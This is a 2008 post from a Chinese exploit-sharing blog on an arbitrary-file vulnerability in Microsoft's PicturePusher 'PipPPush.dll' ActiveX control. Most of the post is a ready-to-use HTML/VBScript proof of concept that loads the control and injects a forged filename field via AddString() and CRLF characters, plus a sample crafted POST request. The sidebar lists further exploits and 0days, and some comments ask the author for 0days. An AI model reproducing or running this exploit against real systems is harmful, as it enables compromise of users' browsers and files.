3xp-0day'Blog

3xp-0day
    <<  Serv-U 7.2.0.1 ftp file replacement | 首页 | MS Windows GDI+ Proof of Concept (MS08-052) #2  >>
  • 2008-10-12

    Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞 - [exp'or'0day]

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://3xp-0day.blogbus.com/logs/30157362.html

    Microsoft Digital Image是一款图像管理处理工具。
    其包含的PicturePusher 'PipPPush.dll' ActiveX控件存在设计问题,远程攻击者可以利用漏洞从任意位置下载文件到受影响的电脑。
    控件允许构建定制的POST请求实现上传功能,使用浏览器作为代理可以回弹,并通过AddString()方法注入文件名子字段。类似的POST请求如下:
    POST /?aaaa=1 HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
    Host: 127.0.0.1
    Content-Length: 181
    Cache-Control: no-cache
    -----------------------------
    Content-Disposition: form-data; name="aaaa"; filename="suntzu.test"
    Content-Type: text/plain; AAAA: ""
    xxxxxxxx
    -------------------------------

     

     

    <HTML>
    <OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' />
    </OBJECT>
    <script language='vbscript'>
        'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1"
        PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1"
        PicturePusherControl.AddSeperator
        CRLF = unescape("%0d%0a")
        FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """
        Value="xxxxxxxx"
        'for some reason cannot do this with AddFile() method, however...
        PicturePusherControl.AddString FormElementName ,Value 
        PicturePusherControl.Post
    </script>
    

    历史上的今天:

    MS Windows GDI+ Proof of Concept (MS08-052) #2 2008-10-12

    随机文章:

    关于QQ空间挂马的原理 2008-08-06
    sablog 1.6注射漏洞 2008-08-06
    phpwind任意修改管理员密码漏洞 2008-08-06
    PowerDVD '.m3u'/'.pls'文件多个缓冲区溢出漏洞 2008-07-24
    Kaspersky kl1.sys驱动本地栈溢出漏洞 2008-06-07

    收藏到:Del.icio.us




    Tag:
    引用地址:
    3exxp-0day 发表于08:44:15 | 编辑 | 继续话题 | 转发 | 分享 0

搜索

最新日志

  • MS Windows GDI+ Proof of Concept (MS08-052) #2
  • Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞
  • Serv-U 7.2.0.1 ftp file replacement
  • MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded
  • RealPlayer/Helix Player Remote Format String Exploit (linux)
  • QZone新版开始支持Firefox浏览器
  • VB100结果揭晓 金山毒霸三冠王
  • PhpCms2007 sp6 SQL injection 0day
  • ESET System Analyzer Tool
  • 传说中微软最强的漏洞MS08052的利用代码
全部日志>>

最新评论

  • XXOXX:这里的东西还不是别人公开之后 兰州转载来了。。。。...
  • 劉:我的公司電腦,不知道哪里被控制了,無法上QQ有哪位高手指...
  • CZ-SMARTONE:SB
  • SNK:你好朋友,我这边有点业务方面的事想和你谈谈。 具体的可...
  • 尤:【QQ 版本】Build 18.55.1250 【Q...
  • aladan:你好,想找你修改一下溢出程序, lifei1949@...
  • xiao3:弱弱的问一下:博主,你手里有诱人的0day吗?...
  • g-hack:友情链接 地址www.G-hack.com 名称:...
  • crab:汗~又看了下,自己错误,命令多了个空格~ ------...
  • crab:试了下,快捷方式,不支持哦! %windir%\sys...
  • 访问统计:
  • RSS 什么是RSS?
    用IM提醒我内容更新
    订阅到QQ邮箱
    订阅到鲜果阅读器
    订阅到Google阅读器
    订阅到抓虾阅读器
  • 《城客》第四期:创意之城
    博客大巴
    博客大巴使用指南
    博客大巴模板中心
    免费注册博客大巴
    一键博客搬家工具
    中文互动杂志城客
Copyright © 2002-2009 BlogBus.com, All Rights Reserved. 博客大巴 版权所有
博客大巴模板设计:那时花开 | 作者:bxguang